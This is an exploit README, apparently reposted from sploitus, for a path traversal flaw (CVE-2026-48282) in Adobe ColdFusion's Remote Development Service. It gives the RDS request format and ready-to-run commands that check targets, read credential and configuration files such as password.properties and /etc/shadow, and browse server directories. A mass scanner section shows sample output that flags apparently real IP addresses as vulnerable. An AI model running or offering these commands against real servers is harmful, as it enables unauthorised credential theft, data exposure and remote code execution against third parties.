Share
## https://sploitus.com/exploit?id=7F545708-BC92-502E-8843-CCFCD621EA57
# CVE-2026-48282-POC

**CVE-2026-48282** is a **path traversal** vulnerability in **Adobe ColdFusion's Remote Development Service (RDS)** with a CVSS score of **10.0 (Critical)**. It allows unauthenticated attackers to read & write arbitrary files via the `/CFIDE/main/ide.cfm` endpoint, leading to **Remote Code Execution (RCE)**.

## ๐Ÿ“Š Overview

| | |
|---|---|
| **CVE** | CVE-2026-48282 |
| **CVSS** | 10.0 (Critical) |
| **Type** | CWE-22: Path Traversal โ†’ Arbitrary File Read/Write โ†’ RCE |
| **Vendor** | Adobe |
| **Product** | ColdFusion 2025 โ‰ค Update 9, ColdFusion 2023 โ‰ค Update 20 |
| **Endpoint** | `/CFIDE/main/ide.cfm` |
| **Prerequisites** | RDS enabled + authentication disabled |
| **Discovered by** | WatchTowr Labs / QiAnXin CERT |
| **Patch** | [APSB26-68](https://helpx.adobe.com/security/products/coldfusion/apsb26-68.html) |

---

## ๐Ÿ”ฌ How It Works

Adobe ColdFusion uses a **proprietary RDS protocol** to communicate with development tools like Dreamweaver. The protocol encodes data in `STR:` format within the HTTP POST body:

```
POST /CFIDE/main/ide.cfm HTTP/1.1
Content-Type: application/x-ColdFusionIDE
User-Agent: Dreamweaver-RDS-SCM1.00

N:STR:LEN:VALUE[STR:LEN:VALUE...]
```
## Installation

```bash
# Clone the repository
git clone https://github.com//CVE-2026-48282.git
cd CVE-2026-48282

# Install dependencies (only requires `requests`)
pip install -r requirements.txt
```
# Usage

### Step 1 โ€” Check if a target is vulnerable

```bash
python cve-2026-48282.py -t http://target.com --check
```
```
[+] RDS endpoint is reachable.
[+] Target appears vulnerable, OS: windows
[โœ“] TARGET IS VULNERABLE to CVE-2026-48282
```
### Step 2 โ€” Read sensitive files

Once confirmed vulnerable, extract credentials and configuration:

```bash
# ColdFusion admin password hash
python cve-2026-48282.py -t http://target.com \
    --read "C:\\CFusionMX7\\lib\\password.properties"

# Database connection strings (neo-query.xml)
python cve-2026-48282.py -t http://target.com \
    --read "C:\\CFusionMX7\\lib\\neo-query.xml"

# ColdFusion security configuration
python cve-2026-48282.py -t http://target.com \
    --read "C:\\CFusionMX7\\lib\\neo-security.xml"

# IIS metabase (Windows servers)
python cve-2026-48282.py -t http://target.com \
    --read "C:\\Windows\\System32\\inetsrv\\MetaBase.xml"

# Application source code
python cve-2026-48282.py -t http://target.com \
    --read "C:\\inetpub\\wwwroot\\index.cfm"

# Linux targets
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read /etc/shadow

# Save output to a file
python cve-2026-48282.py -t http://target.com --read "C:\\boot.ini" -o boot.ini
```
### Step 3 โ€” Browse directories

```bash
# List root directory
python cve-2026-48282.py -t http://target.com --browse "C:\\"

# List web root
python cve-2026-48282.py -t http://target.com --browse "C:\\inetpub\\wwwroot"

# List ColdFusion config directory
python cve-2026-48282.py -t http://target.com --browse "C:\\ColdFusion2023\\cfusion\\lib"

# Linux
python cve-2026-48282.py -t https://target.com --browse "/opt/coldfusion/cfusion/lib"
```

## Mass Scanner โ€” Scan Hundreds of Targets

The included `mass_scanner.py` reads a CSV file of targets and tests all of them in parallel.

```bash
# 1. Prepare a CSV file (columns: host,ip,port,domain)
cp /path/to/Asset-Data.csv targets.csv

# 2. Run the scanner
python mass_scanner.py
```

```
[*] Unique targets to scan: 366
[*] Scanning with 30 threads...
  [  1/366] 110.159.228.197:80    ๐Ÿšจ VULNERABLE
  [  2/366] 202.58.82.85:80       โš ๏ธ  RDS open
  ...
  [366/366] 175.142.20.5:8888     ๐Ÿ”ด connection_refused

Scan complete in 38.3s

๐Ÿšจ Vulnerable:        1
โš ๏ธ  RDS accessible:    9
๐Ÿ”ต ColdFusion found:   17
๐Ÿ“Š Total scanned:      366
```